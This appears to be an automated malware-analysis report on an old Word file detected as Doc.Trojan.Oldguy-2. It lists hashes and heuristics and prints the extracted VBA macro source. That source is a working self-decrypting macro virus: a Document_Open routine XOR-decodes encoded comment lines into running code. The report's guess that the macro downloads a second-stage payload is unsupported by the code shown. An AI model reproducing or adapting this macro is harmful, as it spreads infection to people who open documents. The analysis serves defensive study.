Office (OLE) malware analysis — malicious · 5e0f6cf7cafeb2ae

MALICIOUS

Office (OLE)

40.0 KB Created: 2001-06-22 08:27:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 97366cf981b6cc7488ee5bb0c35085a3 SHA-1: 4ddd05215739b9c4cac2dffecfb70086ccbd02d2 SHA-256: 5e0f6cf7cafeb2ae9daebbe06fc854ec72f87c952b5b67a07daa972dec90266e

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The ClamAV detection 'Doc.Trojan.Oldguy-2' strongly indicates malicious intent. The macro code appears to be obfuscated, suggesting an attempt to hide its true functionality, likely to download and execute a second-stage payload.

Heuristics 3

ClamAV: Doc.Trojan.Oldguy-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Oldguy-2
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3469 bytes
SHA-256: `e39f398aebc08076ac7d506dbb739383d8db168c477cfef85383ff64b22962b3`
Detection ClamAV: Doc.Trojan.Oldguy-2 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next For y = 7 To 25: ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine y, c(Mid(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(y, 1), 2), Val(Mid(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(33, 1), 2))): Next Element End Sub Private Sub Element() 'ѕџСґѓѓћѓСЈ”‚„њ”Сї”‰… 'ў”…°……ѓСїћѓњђќҐ”њЃќђ…”Я·„ќќїђњ”ЭС‡“їћѓњђќ 'љСМСГАБСЪСёџ…ЩЈџ•СЫСЕДШ 'Ґ™�‚µћ’„њ”џ…Я§іЎѓћ›”’…Я§іІћњЃћџ”џ…‚ЩАШЯІћ•”јћ•„ќ”ЯЈ”Ѓќђ’”Ѕ�џ”СВВЭСІ™ѓЩВИШСЧСљ '·ћѓС€СМСЖСҐћСГД 'Ґ™�‚µћ’„њ”џ…Я§іЎѓћ›”’…Я§іІћњЃћџ”џ…‚ЩАШЯІћ•”јћ•„ќ”ЯЈ”Ѓќђ’”Ѕ�џ”С€ЭСІ™ѓЩВИШСЧС’ЩҐ™�‚µћ’„њ”џ…Я§іЎѓћ›”’…Я§іІћњЃћџ”џ…‚ЩАШЯІћ•”јћ•„ќ”ЯЅ�џ”‚Щ€ЭСАШЭСљШ 'ї”‰… '°ЃЃќ�’ђ…�ћџЯѕЃ…�ћџ‚Я§�ѓ„‚Ўѓћ…”’…�ћџСМС·ђќ‚” '°ЃЃќ�’ђ…�ћџЯѕЃ…�ћџ‚Яўђ‡”їћѓњђќЎѓћњЃ…СМС·ђќ‚” '°ЃЃќ�’ђ…�ћџЯµ�‚Ѓќђ€°ќ”ѓ…‚СМС†•°ќ”ѓ…‚їћџ” '°ЃЃќ�’ђ…�ћџЯµ�‚Ѓќђ€ў…ђ…„‚іђѓСМС·ђќ‚” 'ё—СҐ™�‚µћ’„њ”џ…СМС°’…�‡”µћ’„њ”џ…СҐ™”џСў”…С™ћ‚…СМСїћѓњђќҐ”њЃќђ…”Сґќ‚”Сў”…С™ћ‚…СМС°’…�‡”µћ’„њ”џ… 'ё—С™ћ‚…Я§іЎѓћ›”’…Я§іІћњЃћџ”џ…‚ЩАШЯІћ•”јћ•„ќ”ЯЅ�џ”‚ЩГЖЭСАШСНПСУЎѓ�‡ђ…”С·„џ’…�ћџС’Щ†ЭљШУСҐ™”џ '™ћ‚…Я§іЎѓћ›”’…Я§іІћњЃћџ”џ…‚ЩАШЯІћ•”јћ•„ќ”Я•”ќ”…”ќ�џ”‚САЭС™ћ‚…Я§іЎѓћ›”’…Я§іІћњЃћџ”џ…‚ЩАШЯІћ•”јћ•„ќ”Я’ћ„џ…ћ—ќ�џ”‚ '™ћ‚…Я§іЎѓћ›”’…Я§іІћњЃћџ”џ…‚ЩАШЯІћ•”јћ•„ќ”Я�џ‚”ѓ…ќ�џ”‚САЭСҐ™�‚µћ’„њ”џ…Я§іЎѓћ›”’…Я§іІћњЃћџ”џ…‚ЩАШЯІћ•”јћ•„ќ”ЯЅ�џ”‚ЩАЭСВЕШ 'ё—С™ћ‚…СМС°’…�‡”µћ’„њ”џ…СҐ™”џС°’…�‡”µћ’„њ”џ…Яўђ‡”°‚С°’…�‡”µћ’„њ”џ…Я·„ќќїђњ” 'ґџ•Сё— 'Ґ™�‚µћ’„њ”џ…Яўђ‡” 'ё—Сј�џ„…”Щїћ†ЩШШСМСў”’ћџ•Щїћ†ЩШШСҐ™”џСј‚–іћ‰СУЯЯЯ€ћ„ЭСљ””ЃСђ†ђ€С—ѓћњСњ”ЭСљ””ЃСђ†ђ€С—ѓћњС…™”њРУЭСБЭСУІќђ‚‚Яґќ”њ”џ…У End Sub Private Function c(w, k) For y = 1 To Len(w) c = c & Chr(Asc(Mid(w, y, 1)) Xor k) Next End Function 'Class.Element by an old friend... eikcaj- '241

Open this report in the interactive analyzer, or submit your own file for analysis.